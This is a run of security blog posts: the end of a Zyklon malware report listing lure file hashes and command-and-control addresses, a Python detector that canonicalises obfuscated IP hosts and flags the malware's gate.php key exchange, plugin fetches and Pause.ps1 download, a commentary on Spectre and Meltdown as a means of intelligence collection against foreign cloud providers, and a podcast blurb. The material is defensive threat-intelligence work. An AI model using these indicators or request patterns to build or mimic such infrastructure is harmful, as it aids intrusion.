76011037410d031aa41e5d381909f9ce    accounts.doc
4bae7fb819761a7ac8326baf8d8eb6ab    Courrier.doc
eb5fa454ab42c8aec443ba8b8c97339b    doc.doc
886a4da306e019aa0ad3a03524b02a1c    Pause.ps1
04077ecbdc412d6d87fc21e4b3a4d088    words.exe

Table 3: Sample Zyklon lures

Network Indicators

  • 154.16.93.182
  • 85.214.136.179
  • 178.254.21.218
  • 159.203.42.107
  • 217.12.223.216
  • 138.201.143.186
  • 216.244.85.211
  • 51.15.78.0
  • 213.251.226.175
  • 93.95.100.202
  • warnono.punkdns.top
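The indicators above are only useful if the host in a proxy or web log is compared in the same form: the dot-less decimal URL noted earlier (hxxp://258476380) would sail past a plain string match, as would the hex, octal and partial-dotted forms that URL parsers also accept. The following is an added example, not FireEye's rules, that canonicalises the host with inet_aton semantics and then tags requests against the indicator list, the gate.php getkey=y key exchange, the /plugin/index.php?plugin= fetches and the Pause.ps1 download described in the sections above. The request records are constructed; IOC_HOSTS and IP_LOOKUP_HOSTS are copied from this post, and 15.104.9.92 is simply the arithmetic decoding of 258476380, not an indicator from the report.

```python
"""Match outbound requests against the Zyklon network indicators above, after
canonicalising the host: dot-less decimal (hxxp://258476380), hex, octal and
partial-dotted forms all collapse to one dotted-quad. Also tags the gate.php
key exchange, /plugin/index.php fetches and the Pause.ps1 stage download.

Added example, not FireEye's rules. Request records are constructed;
IOC_HOSTS and IP_LOOKUP_HOSTS are copied from the post. 15.104.9.92 is the
arithmetic decoding of 258476380, not an indicator from the report."""
import ipaddress
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

IOC_HOSTS = {
    "154.16.93.182", "85.214.136.179", "178.254.21.218", "159.203.42.107",
    "217.12.223.216", "138.201.143.186", "216.244.85.211", "51.15.78.0",
    "213.251.226.175", "93.95.100.202", "warnono.punkdns.top",
}
# External-IP lookup services Zyklon uses; benign on their own, so only a lead.
IP_LOOKUP_HOSTS = {"api.ipify.org", "ip.anysrc.net", "myexternalip.com", "whatsmyip.com"}

_NUM = re.compile(r"0x[0-9a-f]+|[0-9]+")


def _part(p: str) -> int:
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)


def normalize_host(host: str) -> str:
    """Canonical dotted-quad for any numeric host form; lowercase name otherwise.
    Follows inet_aton: the last part fills the remaining bits, so 258476380 and
    0x7f.1 (127.0.0.1) are valid while 1.2.3.4.5 and 192.168.1.256 are not."""
    host = host.lower().replace("[.]", ".").strip(".")
    parts = host.split(".")
    if len(parts) > 4 or not all(_NUM.fullmatch(p) for p in parts):
        return host
    try:
        nums = [_part(p) for p in parts]
    except ValueError:
        return host
    widths = [8] * (len(nums) - 1) + [32 - 8 * (len(nums) - 1)]
    value = 0
    for n, w in zip(nums, widths):
        if n >= 1 << w:
            return host                   # part overflows its field: not an address
        value = (value << w) | n
    return str(ipaddress.IPv4Address(value))


def classify_request(method: str, url: str, body: str = "") -> List[str]:
    """Reasons this request matches Zyklon activity; empty list if none."""
    url = re.sub(r"^hxxp", "http", url, flags=re.I).replace("[.]", ".")
    u = urlsplit(url)
    raw_host = (u.hostname or "").lower()
    host = normalize_host(raw_host)
    query = parse_qs(u.query)
    reasons = []
    if host != raw_host:
        reasons.append(f"obfuscated host {raw_host} -> {host}")
    if host in IOC_HOSTS:
        reasons.append(f"host {host} in indicator list")
    if host in IP_LOOKUP_HOSTS:
        reasons.append(f"external IP lookup via {host}")
    if method.upper() == "POST" and u.path.endswith("/gate.php") and "getkey=y" in body:
        reasons.append("Zyklon key exchange (POST gate.php getkey=y)")
    if u.path.endswith("/plugin/index.php") and "plugin" in query:
        reasons.append(f"Zyklon plugin fetch: {query['plugin'][0]}")
    if u.path.endswith("/Pause.ps1"):
        reasons.append("Pause.ps1 stage download")
    return reasons


# Constructed request records: (method, url, body).
SAMPLE_REQUESTS = [
    ("GET", "hxxp://258476380/Pause.ps1", ""),
    ("POST", "http://154.16.93.182/gate.php", "getkey=y"),
    ("GET", "http://warnono.punkdns[.]top/plugin/index.php?plugin=socks", ""),
    ("GET", "http://api.ipify.org/", ""),
    ("GET", "http://example.invalid/index.html", ""),
]


def demo() -> Dict[str, List[str]]:
    return {url: classify_request(m, url, b) for m, url, b in SAMPLE_REQUESTS}
```

Run `normalize_host()` over the host column before any indicator join, and treat a host that changed under normalisation as a finding in its own right: legitimate software almost never addresses a server by a bare 32-bit integer, so the obfuscation is a stronger signal than the particular address it hides.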

Spectre and Meltdown from a CNO Perspective

Longtime readers know that I have no problem with foreign countries replacing American vendors with local alternatives. For example, see Five Reasons I Want China Running Its Own Software. This is not a universal principle, but as an American I am fine with it. Putting my computer network operations (CNO) hat on, I want to share a few thoughts about the intersection of the anti-American vendor mindset with the recent Spectre and Meltdown attacks.

There are probably non-Americans, who, for a variety of reasons, feel that it would be "safer" for them to run their cloud computing workloads on non-American infrastructure. Perhaps they feel that it puts their data beyond the reach of the American Department of Justice. (I personally feel that it's an over-reach by DoJ to try to access data beyond American borders, e.g., Microsoft Corp. v. United States.)

The American intelligence community and computer network operators, however, might prefer to have that data outside American borders. These agencies are still bound by American laws, but those laws generally permit exploitation overseas.

Now put this situation in the context of Spectre and Meltdown. Begin with the attack scenario mentioned by Nicole Perlroth, where an attacker rents a few minutes of time on various cloud systems, then leverages Spectre and/or Meltdown to try to gather sensitive data from other virtual machines on the same physical hardware.

No lawyer or judge would allow this sort of attack scenario if it were performed in American systems. It would be very difficult, I think, to minimize data in this kind of "fishing expedition." Most of the data returned would belong to US persons and would be subject to protection. Sure, there are conspiracy theorists out there who will never trust that the US government follows its own laws. These people are sure that the USG already knew about Spectre and Meltdown and ravaged every American cloud system already, after doing the same with the "Intel Management Engine backdoors."

In reality, US law will prevent computer network operators from running these sorts of missions on US cloud infrastructure. Overseas, it's a different story. Non-US persons do not enjoy the same sorts of privacy protections as US persons. Therefore, the more "domestic" (non-American) the foreign target, the better. For example, if the IC identified a purely Russian cloud provider, it would not be difficult for the USG to authorize a Spectre-Meltdown collection operation against that target.

I have no idea if this is happening, but this was one of my first thoughts when I first heard about this new attack vector.

Bonus: it's popular to criticize academics who research cybersecurity. They don't seem to find much that is interesting or relevant. However, academics played a big role in discovering Spectre and Meltdown. Wow!

Analyzing the Malware Analysts – Inside FireEye’s FLARE Team

At the Black Hat USA 2016 conference in Las Vegas last week, I was fortunate to sit down with Michael Sikorski, Director, FireEye Labs Advanced Reverse Engineering (FLARE) Team.

During our conversation we discussed the origin of the FLARE team, what it takes to analyze malware, Michael’s book “Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software,” and the latest open source freeware tools FLOSS and FakeNet-NG.

Listen to the full podcast here.